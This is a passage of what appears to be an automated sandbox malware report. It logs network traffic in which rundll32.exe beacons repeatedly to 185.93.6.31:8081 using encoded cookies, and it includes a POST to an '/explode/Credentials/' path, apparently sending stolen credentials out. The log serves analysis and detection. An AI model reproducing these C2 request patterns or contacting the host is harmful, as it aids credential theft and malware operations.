              Sep 25, 2021 20:18:57.895018101 CEST | 53 | 60338 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:58.501722097 CEST | 58717 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:58.521997929 CEST | 53 | 58717 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:58.908339977 CEST | 59762 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:58.926666975 CEST | 53 | 59762 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:18:59.851284981 CEST | 54329 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:18:59.871064901 CEST | 53 | 54329 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:00.517580032 CEST | 58052 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:00.541317940 CEST | 53 | 58052 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:01.267178059 CEST | 54008 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:01.287280083 CEST | 53 | 54008 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:01.975260973 CEST | 59451 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:01.999336004 CEST | 53 | 59451 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:03.006748915 CEST | 52914 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:03.039854050 CEST | 53 | 52914 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:03.897259951 CEST | 64569 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:03.917697906 CEST | 53 | 64569 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:17.236177921 CEST | 52816 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:17.263418913 CEST | 53 | 52816 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:45.283788919 CEST | 50781 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:45.309935093 CEST | 53 | 50781 | 8.8.8.8 | 192.168.2.7
              Sep 25, 2021 20:19:47.674890041 CEST | 54230 | 53 | 192.168.2.7 | 8.8.8.8
              Sep 25, 2021 20:19:47.708858967 CEST | 53 | 54230 | 8.8.8.8 | 192.168.2.7

              HTTP Request Dependency Graph

              • 185.93.6.31:8081

              HTTP Packets

              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              0 | 192.168.2.7 | 49740 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:10.907609940 CEST | 905 | OUT | GET /Register/v7.19/UJCIF1N2 HTTP/1.1
              Accept: application/json, application/xhtml+xml, image/*
              Accept-Language: zh-cn
              Accept-Encoding: identity, br
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:10.938972950 CEST | 906 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:10 GMT
              Server: gsw
              Content-Length: 264862
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              1 | 192.168.2.7 | 49741 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:11.165000916 CEST | 1183 | OUT | GET /Register/v7.19/UJCIF1N2 HTTP/1.1
              Accept: application/json, application/xhtml+xml, image/*
              Accept-Language: zh-cn
              Accept-Encoding: identity, br
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:11.192579985 CEST | 1183 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:11 GMT
              Server: gsw
              Content-Length: 264862
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              10 | 192.168.2.7 | 49754 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:22.049355030 CEST | 1788 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc_1otimgQza-n-jl0HiayqIQ4CKkho9_S08EFgs-hYOJXPT7VgFOT_wmCHisrduUFPISKNpZqZ4SpRIAAr8wWdmCSVJD8sMwdEzI_i0O_RXBxC2SULTWHX1dWviirlTiJDRtT3DAwjjCZakilCECsx-qYjA0QFU7XsOTqLcKhMTkrxC
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:22.077219963 CEST | 1788 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:22 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              11 | 192.168.2.7 | 49755 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:22.233043909 CEST | 1792 | OUT | POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=KDDINCJEJFALOEKAJEAIOLKAJB HTTP/1.1
              Accept: image/*, application/xml, text/html
              Accept-Language: es-pe
              Accept-Encoding: gzip, *
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Content-Length: 11216
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:22.261562109 CEST | 1803 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:22 GMT
              Server: cloudflare
              Content-Length: 2298
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: plain/text; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              12 | 192.168.2.7 | 49756 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:26.042768955 CEST | 1807 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=AwU8qo_9PnqUL29tufEMQljJk1Sr-fV9mDSTS2TbfGXjhaF-_1aI4syv_Uyjzgmve6nUBCXRi9PfcTx1zGJBwgySGWhnUKIQKLdLRGMzX-zzz8Rwly4nmHG8TXZQv35O8zrl5mrfK5ck7Eo2LMjTFfKVD6-bHAO47nJDzaeUSUcFSkLm
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:26.073896885 CEST | 1807 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:26 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              13 | 192.168.2.7 | 49757 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:30.039153099 CEST | 1810 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=B47OKYp5cTmTShmWLZXpVtHOOHBKfCMK-KAtrl2OzfeoLTVmC0XjdlrPYw4K5aNNeMtLHSgQaxlK5EozsUImtteFyGVordlbmKfu0M_-eCixY06Cde_7h7zAx2fL8As-ciCWUDAY90MSvj9e_jiLvXzAjzvmjAbBs_EFhDJBcTVlI6gG
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:30.067497015 CEST | 1811 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:30 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              14 | 192.168.2.7 | 49758 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:30.635162115 CEST | 1814 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=iU1Z0iwkLXwueNPTY8NOG94K7_B-ELZNCa-QYKyuVmb6p9-jGdqpSctyNFEWMBsepNFkOFfrytaMyDg49IhQsZPkpVW9jWd8NVOfUww2l4SjhbzGvcB_KIF32RsWCBUjfBJ9xclBr3gXizrUftIoejj8Bfg0U60kGfmiPlZehmPnEBAy
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:30.664266109 CEST | 1815 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:30 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              15 | 192.168.2.7 | 49759 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:31.745750904 CEST | 1818 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qOm_jCQRvVw_w-xLEh2PZPMlEHIAFXZbM9gQbc83_0NIaSJYVLoLxGdDfmoIIoqJ0EVXIo49CPV0nb9TZ47C5Kd-mk7MvCE2g1vIYsjf3MpYI0dWPMKkvtpQzlD7U_1oWNZmwMEzqLGPAMkQhyRQM1l5jIkw8ICeRZ7A6wx4ymGupsHA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:31.777113914 CEST | 1818 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:31 GMT
              Server: cloudflare
              Content-Length: 2202
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              16 | 192.168.2.7 | 49762 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:35.931936026 CEST | 1823 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=58MJJWo0tjVzB96azdguWjGD_3yqMeQGGO3qor3DCvtIYPJq6wgkerqCpALqqGRBmIaMEchdrBWqqY0_UQ_hujfID2mI4B5XeOop3C-zvyRRLomOlaI8i1yNAGsrvcwykm1RXNBVME_y8_hSHnVMsZyNSDcGwcHNU7zCiNIMtjmFbm8K
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:35.960251093 CEST | 1830 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:35 GMT
              Server: cloudflare
              Content-Length: 2479
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              17 | 192.168.2.7 | 49763 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:38.946749926 CEST | 1845 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NOIpFJGLXbqT16MV3mw-3WOlnzbDv8aLtADgphEBJqBHCK9lpHXZj3bdRJern2vYGX4U_upEuhAxZ0j-SScgdy5L1ZMAIhe6iPzvlbGZ50IeKswAAG8P7jzYqd2rp2Xlwb0NA3Tu376qJEoSw31YvIVTdT6J_N3ipFbS-Ovx9qVav2D0
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:38.975399971 CEST | 1845 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:38 GMT
              Server: cloudflare
              Content-Length: 2181
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              18 | 192.168.2.7 | 49764 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:39.773361921 CEST | 1848 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8dZTfX0uUa1m_AC6SyJjlaoa_INZKpqqauf8nJYIE7IRVs6pDYXnNT58kptRHWZ4iXq709cC5AQtolOiPrEuFf5Bdr-Vg83H2mQkk5HgMDsBHKunZf1IT4NvIqGibBGZAemKMZgMREDWPyXh3hu8wgBGYHhpz2xvHKEsGlVHJpD3mS0x
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:39.802710056 CEST | 1849 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:39 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              19 | 192.168.2.7 | 49765 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:44.619920969 CEST | 1852 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=EdI9V5wlgkeFFuroO8kaKMeSyw5cINB07vze0EvSPom-ccYYHRkQCEyTkHAcuVAzbpe4Yz5MmGdcuLlNpx7VyMHZOxt-8Soljvsdrtmii1anP738Y7MI-aqcNBndrPhAZHxlLiZEBD0E4swg6GR4w2qcfEXw0PW_pa32-iQdgktzf1t4
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:44.648509979 CEST | 1853 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:44 GMT
              Server: cloudflare
              Content-Length: 2181
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              2 | 192.168.2.7 | 49742 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:11.283211946 CEST | 1390 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc3_iPE1_Vjq56xPxznPYCYBUHbVMTZf5vxQaRoTv0edTWJcgZ5LwLJnPm7dBsqNBWEXJlsZSPGhuf9XsqqC4HJa2koZmGEyVn-IZh37nM6NBwdS6ebkug90jlQud71sjfImxBQX6LVaJIkUUgAQN4xdzI3l1MCakLqA79lcimV7goHE
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:11.318860054 CEST | 1459 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:11 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              20 | 192.168.2.7 | 49766 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:48.402589083 CEST | 1856 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VCBqBNjYaNTDCjnD7tRa7A_sxfr83KPTzxHF5TP-Ksu0oPfQqHPeTJuKq-L0618BLIyCqnL03X2IVGrbm0cXbFu3T8YwdfS-f5Id6jQWCUKk6pLewAtxNiaZG9gHmijgpB-zSD36fTlzyRyYe-2Fu6WwWQHMOVUWuVcVY_CxH-lSbxRI
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:48.431732893 CEST | 1856 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:48 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              21 | 192.168.2.7 | 49767 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:48.466336012 CEST | 1860 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qYGqnwzo3jEOtCCeQw-9Vv7GHL1e3EUAKWNjLYxipSvaayzuORZaBOu-xxw2_OhThB2XdXcnOZusBMt11ESj_LMoVhidQZQxFZ9sHiz6ZMmDSU-LnQyMZaG7KlY2xOZuXN6OiOmNXDU3R8mZXh7bNxgw9rUUn15pOTVRc3aSdS7H3ON_
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:48.495151997 CEST | 1860 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:48 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              22 | 192.168.2.7 | 49768 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:50.603666067 CEST | 1864 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=z3wjoEKLnLBbuPQf5WcE3xk81fmCjs6DMFLAJ5V8IH5g39jvw7cO_5I9jofCF07EsDmmlODihpCCFqe6ebDLPx93JeygXzTSUFUDWQcMlaF5kaMLvR0WDnQyKu4DAua3utJ72fjqGsraTNLXNspmNLQyYrIufutIewPoDfqznLyt0UWP
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:50.631973982 CEST | 1864 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:50 GMT
              Server: cloudflare
              Content-Length: 2245
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              23 | 192.168.2.7 | 49769 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:54.144264936 CEST | 1867 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=pRHTCAB4p6YCJFkJT5_EwfJWZSpSTDyXJfMauoDy3LzW-1V5NYYjk-cuvos6bJHEiI3u4nu3QAyglLLi2NTaa7-4L4-R0e2mGQ8ViSBqHV6P2TYckZz18q0rU8E6VJ_5UE73H-UdJaI717AOUo6ioBSgjyIYDyf-NaUo5HoCDLnLTJro
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:54.175657988 CEST | 1868 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:54 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              24 | 192.168.2.7 | 49770 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:54.343552113 CEST | 1871 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=s2BnkT-YZUEkSjRWCZRXeeisyG8bnK5GKFHIcNS-J15T4PpFTzPT2XzKpncTq1KUy8yPP5W00OhvFGdOfAca-bz3QlPXNfkrmNIQf9NWBNdDqp9LJ0t8o8HZFk3g2iV1Q1--3dq6cKyUiRENnK2ILkLwVJQreViDXhcY9hfxEny1Lxnd
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:54.374902964 CEST | 1872 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:54 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              25 | 192.168.2.7 | 49787 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:59.994988918 CEST | 2152 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=YPUU7u0Cq_70McNRSu4zkba14rctB_nNn9v3aTr1FzDPVu-hbD45sT20ucltnnmKH7CR2k9rsd4tn5D01jn8cbD-EqIP1gOc_9w0F6iFou_WGJRFEpQhQNu7HaCsi9H5FVtMl1djLYR1xeWZmUNRehu7VfyB99wG1IrfQ1U6q_ICWHLB
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:00.023251057 CEST | 2153 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:00 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              26 | 192.168.2.7 | 49790 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:00.280576944 CEST | 2168 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=G3ex6b4exUe8Qjvo8fmmIEwwB8vsKl52m5V4Wz6Uvl1onTeYi-BBcllI3GqECvMlNuuMA8XRIu0e8tADZrK4igHeTW4vt49Hp2l3aJ4Mf78xv1T9L_qXExNNMSCEMv0Y7iiV_lt7R0OFsdLv7OjAQarG7cOmaUUfi8NKBcRkblh1KvgJ
